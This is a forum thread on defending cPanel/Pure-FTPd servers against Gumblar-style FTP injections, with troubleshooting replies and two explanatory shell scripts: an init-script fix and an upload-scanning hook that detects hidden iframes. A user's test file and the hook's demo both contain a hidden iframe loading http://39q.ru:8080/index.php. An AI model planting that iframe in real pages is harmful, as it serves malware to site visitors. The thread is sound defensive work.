SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...

smksa

Hi,

I notice that the script scans the overwritten file and moves it to quarantine.

E.g. public_html/index.php: if the attack overwrites index.php, the existing index.php is removed and moved to the quarantine folder.

Is there any way that we can avoid the overwrite and avoid removal of the existing index.php file?

Probably by scanning during the upload, before the overwrite happens?
 

hidonet

I want to scan before the overwrite, but this is not possible at this time.
I've contacted the author of PureFTPd and asked him. He has not replied to me yet.
 

isputra

It's not working. After installing this script as in the manual and restarting FTP, I tried to upload a file with this code in it:

HTML:
<iframe src="http://39q.ru:8080/index.php" width=124 height=163 style="visibility: hidden"></iframe>
The file, which I called if-rame.html, still went through the FTP process and resides on the server without being rejected by this script.

So.. how do I get this script working?
 

hidonet

I'm going to update my script.

These changes will be applied to the script very soon:

1) The .sh file will no longer be needed.
2) The user name will be extracted from the file path. This was a bug: Pure-FTPd does not return the username and other arguments.
3) I will try to extract a clean copy of the infected file from backup.
 

smksa

Has the pureftpd author responded to your question regarding scanning while uploading?

I think this would be a better solution.
 

webicom

Hello,

I have also installed your script step by step from your site, but it is not working. I have restarted pure-ftpd and clam and it is still not working. The only thing I do not quite get, and maybe this is the mistake that keeps the script from working, is this part at step 2, "Patch /etc/init.d/pure-ftpd": should I do something there? In step 2 I have only "Edit /etc/init.d/pure-ftpd" as you instruct, but I do not know what (if anything) I should do at "Edit /etc/init.d/pure-ftpd".

I would really appreciate your help, since by its description your script looks fantastic and would be a really good defense against iframe and some other hacks too.

Best regards, Erik
 

hidonet

Possible problems:

1) Restart Pure-FTPd with /etc/init.d/pure-ftpd restart; the script does not work with a WHM restart.

2) You can use nano or vi for editing files, e.g. nano /etc/init.d/pure-ftpd

A new update is coming soon...
 

webicom

Thanks, but I did all that and it is not working. If I use the command ps aux | grep clam I do see that /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.sh is running, but it does not scan uploaded files. If I kill that process and restart pure-ftpd, the process starts again but just won't scan files.
 

ThE EnD

I can not get it working

Hello,
First let me thank you so much for that great, hard work.

But I am sorry to tell you I can't make it work on my server.

I followed all the steps in
Anti-Gumblar Protection Documentation
all of them.

But what do I do after that?
Should I do anything, open any files or anything, to make the script start?

Or what?

And another thing: when I type

/etc/init.d/pure-ftpd restart

I get this result:
[email protected] [~]# /etc/init.d/pure-ftpd restart
Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Stopping pure-authd:
Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog --daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
[ OK ]
Starting pure-authd:

Can you solve that please, and thank you.

And should I replace this
GLOBALS["whmhash"] ="511e....2c"; // whm remote access key for root user

with the correct key I get from WHM?

In the end I am sorry for my English.
Waiting for your answer
 

Vinayak

@ThE EnD
@webicom

Have you made the script executable? Check file permissions.

Also note that there are two files: ftp_clamscan.sh, which passes variables to ftp_clamscan.php, so both should have correct permissions.

@webicom
Yes, you should replace
GLOBALS["whmhash"] ="511e....2c"; // whm remote access key for root user

with the correct key you get from WHM.
 

ThE EnD

I have given the two files chmod 755; is that OK?
And then replaced the access key with the right one from WHM for root.

And then tried
[email protected] [~]# /etc/init.d/pure-ftpd restart
Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Stopping pure-authd:
Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog --daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
[ OK ]
Starting pure-authd:

So what's the error here, and how do I solve that problem?

And how do I start the script working?

Please explain
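The two odd lines in the restart output quoted above, cat complaining that /var/run/pure-ftpd/pure-uploadscript.pid does not exist and kill printing its usage text, are exactly what an unguarded "kill $(cat pidfile)" in the stop stanza produces when the pid file is absent; the most likely reason it is absent is that the start step never writes one. The following is an added example of a stop/start pair that tolerates a missing or stale pid file. It is my own code, not the init-script patch from hidonet's documentation (which the thread does not show). The pid file path and the -B -r /root/ftp_clamscan.sh start flags are the ones visible in the thread; -p is pure-uploadscript's pid-file option (confirm with pure-uploadscript -h on your build), and the function names and messages are mine.

```shell
#!/bin/sh
# Added example, not the thread's init-script patch: a stop step for
# pure-uploadscript that tolerates a missing or stale pid file. An unguarded
# `kill $(cat /var/run/pure-ftpd/pure-uploadscript.pid)` is what prints the
# "cat: ... No such file or directory" and "kill: usage: ..." lines seen above.
# Paths and the -B -r flags are the ones in the thread; -p is pure-uploadscript's
# own pid-file option (check pure-uploadscript -h on your build).

PIDFILE="${PIDFILE:-/var/run/pure-ftpd/pure-uploadscript.pid}"
UPLOADSCRIPT="${UPLOADSCRIPT:-/root/ftp_clamscan.sh}"

# Returns 0 when there was nothing to stop or the process was signalled,
# 1 only when a live pid could not be signalled. Always clears the pid file.
stop_uploadscript() {
    if [ ! -f "$PIDFILE" ]; then
        echo "pure-uploadscript: no pid file, nothing to stop"
        return 0
    fi
    pid=$(cat "$PIDFILE")
    rm -f "$PIDFILE"
    case "$pid" in
        ''|*[!0-9]*)
            echo "pure-uploadscript: ignoring stale pid file ($pid)"
            return 0 ;;
    esac
    if kill -0 "$pid" 2>/dev/null; then
        kill "$pid" || return 1
        echo "pure-uploadscript: stopped pid $pid"
    else
        echo "pure-uploadscript: pid $pid not running, stale pid file removed"
    fi
    return 0
}

# Start in the background and write the pid file the stop step relies on.
start_uploadscript() {
    /usr/sbin/pure-uploadscript -B -p "$PIDFILE" -r "$UPLOADSCRIPT"
}

# Stand-alone use: ./this stop | start | restart (no argument does nothing).
case "${1:-}" in
    stop)    stop_uploadscript ;;
    start)   start_uploadscript ;;
    restart) stop_uploadscript && start_uploadscript ;;
esac
```

Put the body of stop_uploadscript in the stop stanza of /etc/init.d/pure-ftpd and make sure the start stanza passes -p with the same path; once the pid file is written on start, the restart output stops complaining and a leftover file from a crashed daemon no longer aborts the stop step.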
 

Vinayak

Use

chmod +x ftp_clamscan.sh
chmod +x ftp_clamscan.php

at the command line. Also see if an error_log file is generated in the same folder. If error_log is there, check it out and see what message is in there.
 

webicom

Thank you vinsar, I forgot to chmod the php file and now that I did it, it is working. But I still have a strange problem: on one server the script always finds the iframe script and blocks the attacker, but does not change the password for the infected user. On the other server the script does not always find the iframe script, but does block the IP and change the password. The first server is CentOS 4.7, the other one is 5.2; both are the same WHM/cPanel version. Usually, on the server where the script does not always find the iframe script, after it finds an infected file I have to kill the pid of the ftp_clamscan.sh script and restart pure-ftpd, and then it finds the script again, but after the first find it does not find it anymore. Any idea why that is?
 

ThE EnD

I have made the changes you requested to the two files,

and these files are in the root directory.

Or where should I put them?
And also,

I am still finding the same error when restarting FTP:

/etc/init.d/pure-ftpd restart
Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Stopping pure-authd:
Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog -- daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y 1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
[ OK ]
Starting pure-authd:


please tell me what 's that
as it's from the two line u ask to add in the ftp conf. files
in ur explain

and u do not answer me

after all that how to know if the script is running or not

and thanks
 

webicom

Run the command ps aux | grep clam through SSH and reply here with what you get. The best way to test if the script is working is to upload index.html or whatever file with an iframe in it; if you have set everything right you should be disconnected from the server and get an email. If you are going to test this way, make sure you still have another location with a different IP from which you can connect again.
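To make concrete what the hook discussed in this thread can and cannot do, here is an added example of a pure-uploadscript hook. It is my own code, not hidonet's ftp_clamscan.sh. pure-uploadscript runs the hook only after an upload has completed, with the file path as its sole argument (the uploader is also exposed in the UPLOAD_USER and UPLOAD_VUSER environment variables), which is why smksa's wish to scan before the overwrite cannot be met this way and an overwritten index.php can only come back from a backup. The example flags the hidden-iframe test file isputra posted by pattern, runs clamscan when ClamAV is installed, moves the hit to quarantine and logs the cPanel account derived from the /home/<user>/ path, as hidonet planned for his update. The quarantine directory, log path, regex, function names and the /home/<user> layout are assumptions for illustration; the IP block and WHM password change the real script also performs are left out. Run with no argument it demonstrates itself on a constructed copy of if-rame.html.

```shell
#!/bin/sh
# Added example, not the thread's ftp_clamscan.sh: a pure-uploadscript hook.
# pure-uploadscript calls it after each completed upload with the path as $1
# and the uploader in UPLOAD_USER / UPLOAD_VUSER. QUARANTINE, LOG, the regex
# and the /home/<user>/ layout below are assumptions for illustration.

QUARANTINE="${QUARANTINE:-/var/quarantine}"
LOG="${LOG:-/var/log/ftp_upload_scan.log}"

# cPanel account owning the upload, taken from the path (/home/<user>/...),
# since the thread reports the username not arriving from pure-ftpd.
user_from_path() {
    case "$1" in
        /home/*/*) printf '%s\n' "$1" | cut -d/ -f3 ;;
        *) printf 'unknown\n' ;;
    esac
}

# 0 if the file carries a hidden iframe of the kind seen in Gumblar-style
# injections (hidden by style, or 0/1 pixel in size), 1 otherwise.
looks_injected() {
    grep -Eiq '<iframe[^>]*(visibility *: *hidden|display *: *none)' "$1" ||
    grep -Eiq '<iframe[^>]*(width|height)="?[01]"?[ />]' "$1"
}

# Scan one upload: pattern check first, then ClamAV if installed.
# Returns 0 when the file is clean and left in place, 1 when quarantined.
scan_upload() {
    f="$1"
    verdict="clean"
    if looks_injected "$f"; then
        verdict="hidden-iframe"
    elif command -v clamscan >/dev/null 2>&1; then
        clamscan --no-summary --quiet "$f" >/dev/null 2>&1
        [ $? -eq 1 ] && verdict="clamav"   # 1 = infected, 2 = scanner error
    fi
    [ "$verdict" = "clean" ] && return 0
    # The upload is already on disk (and any file it replaced is gone), so the
    # best the hook can do is move it aside and record who uploaded it.
    mkdir -p "$QUARANTINE"
    dest="$QUARANTINE/$(date +%Y%m%d%H%M%S)-$(basename "$f")"
    mv "$f" "$dest"
    printf '%s user=%s vuser=%s file=%s verdict=%s quarantine=%s\n' \
        "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$(user_from_path "$f")" \
        "${UPLOAD_VUSER:-?}" "$f" "$verdict" "$dest" >> "$LOG"
    return 1
}

if [ -n "$1" ]; then
    scan_upload "$1"          # invoked by pure-uploadscript
else
    # Stand-alone demo on a constructed copy of the test file from the thread.
    demo=$(mktemp -d)
    QUARANTINE="$demo/quarantine"; LOG="$demo/scan.log"
    printf '%s\n' '<iframe src="http://39q.ru:8080/index.php" width=124 height=163 style="visibility: hidden"></iframe>' > "$demo/if-rame.html"
    scan_upload "$demo/if-rame.html" || cat "$LOG"
fi
```

Installed as the -r target of pure-uploadscript, the hook must be executable by the user pure-uploadscript runs as, which is the permission problem Vinayak pointed to above; a useful check after a restart is to upload the demo file over FTP and confirm both that it vanished from public_html and that the log line names the right account.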